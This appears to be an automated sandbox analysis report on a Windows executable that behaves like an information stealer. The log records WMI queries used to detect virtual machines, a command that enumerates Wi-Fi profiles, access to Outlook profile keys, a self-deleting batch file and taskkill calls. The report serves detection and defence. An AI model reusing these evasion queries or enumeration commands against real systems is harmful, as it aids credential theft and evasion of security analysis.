Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 7fE6IkvYWf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 7fE6IkvYWf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata/ source: 7fE6IkvYWf.exe, 00000000.00000002.4884817050.00000000051C1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.IO.Compression.pdbSystem.Core.dll$! source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.0000000070ACB000.00000020.00000001.01000000.00000008.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Security.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.IO.Compression.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdbL source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.0000000070ACB000.00000020.00000001.01000000.00000008.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: 7fE6IkvYWf.exe, 00000000.00000002.4894349671.0000000070ACB000.00000020.00000001.01000000.00000008.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: 7fE6IkvYWf.exe, 00000000.00000002.4904938704.0000000070CAB000.00000020.00000001.01000000.00000007.sdmp, WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Management.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Management.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.pdb4 source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdbH source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdataatawpr] source: 7fE6IkvYWf.exe, 00000000.00000002.4890691884.000000000A6F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSystem.Drawing.dll source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Net.Http.pdbXdh source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdb source: WER2FC4.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER2FC4.tmp.dmp.16.dr

Source: 7fE6IkvYWf.exe

Static PE information: 0x96EB7DA4 [Sun Mar 27 17:38:44 2050 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .>h"

Source: 7fE6IkvYWf.exe	Static PE information: section name: .4Ul
Source: 7fE6IkvYWf.exe	Static PE information: section name: .+,2
Source: 7fE6IkvYWf.exe	Static PE information: section name: .>h"

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_029917B3 push eax; mov dword ptr [esp], ecx	0_2_029917D4
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_064BD2D0 push esp; ret	0_2_064BD2DD
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Code function: 0_2_07721CD3 push esp; retf	0_2_07721CD4

Source: 7fE6IkvYWf.exe

Static PE information: section name: .>h" entropy: 7.724583620670912

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 1490
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 1490 -> 49714

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from CIM_Memory
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory

Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory

Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: 5110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: 4F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: 7210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Window / User API: threadDelayed 9839

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: 7fE6IkvYWf.exe, 00000000.00000002.4877667569.0000000000D06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\7fE6IkvYWf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4716	Jump to behavior
